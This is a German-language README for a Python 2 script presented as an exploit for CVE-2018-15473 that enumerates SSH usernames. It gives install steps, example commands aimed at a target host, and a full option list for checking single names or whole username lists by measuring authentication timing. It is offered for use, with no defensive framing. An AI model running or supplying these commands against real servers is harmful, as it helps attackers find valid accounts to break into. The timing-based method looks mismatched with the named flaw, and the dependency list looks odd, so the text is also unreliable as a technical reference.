
CVE-2018-15473 Exploit
Du benötigst Python 2.7, um diesen Exploit zu verwenden. Installiere alle unten angegebenen Module in Python 2.7.
Beispiel: python2 -m pip install numpy python2 -m pip install paramiko python2 -m pip install property
Um einen einzelnen Benutzernamen zu testen, verwende diesen Befehl: python ./sshuserenumeration.py -u
Beispiel: python ./sshuserenumeration.py -u root site.com
Um mehrere Benutzernamen mit einer Listendatei zu testen - verwende diesen Befehl: python ./sshuserenumeration.py --userlist <name_list.txt>
Beispiel: python ./sshuserenumeration.py --userlist users.txt site.com
Verwendung: sshuserenumeration.py [-h] [-u USER | -U USERLIST] [-e] [-s] [--bytes BYTES] [--samples SAMPLES] [--factor FACTOR] [--trials TRIALS] host
Positionsargumente: host Geben Sie die SSH-Serveradresse an, wie ip:port oder nur die IP
Optionale Argumente: -h, --help diese Hilfemeldung anzeigen und beenden -u USER, --user USER Geben Sie einen einzelnen Benutzernamen an -U USERLIST, --userlist USERLIST Geben Sie eine Datei mit einer Liste von Benutzern an -e, --enumerated Nur enumerierte Benutzer anzeigen -s, --silent Wie -e, aber nur die Benutzernamen werden nach stdout geschrieben (kein Banner, nichts weiter) --bytes BYTES Senden Sie BYTES in dieser Anzahl als Passwort an den SSH-Daemon --samples SAMPLES Sammeln Sie SAMPLES in dieser Anzahl, um einen Timing-Basiswert zu berechnen für die Authentifizierung nicht vorhandener Benutzer --factor FACTOR Wird verwendet, um die obere Timing-Grenze für die Benutzer enumeration zu berechnen --trials TRIALS Versuchen Sie, Benutzer X TRIALS-mal zu authentifizieren und vergleichen Sie den Mittelwert der Auth-Timings mit der Timing Grenze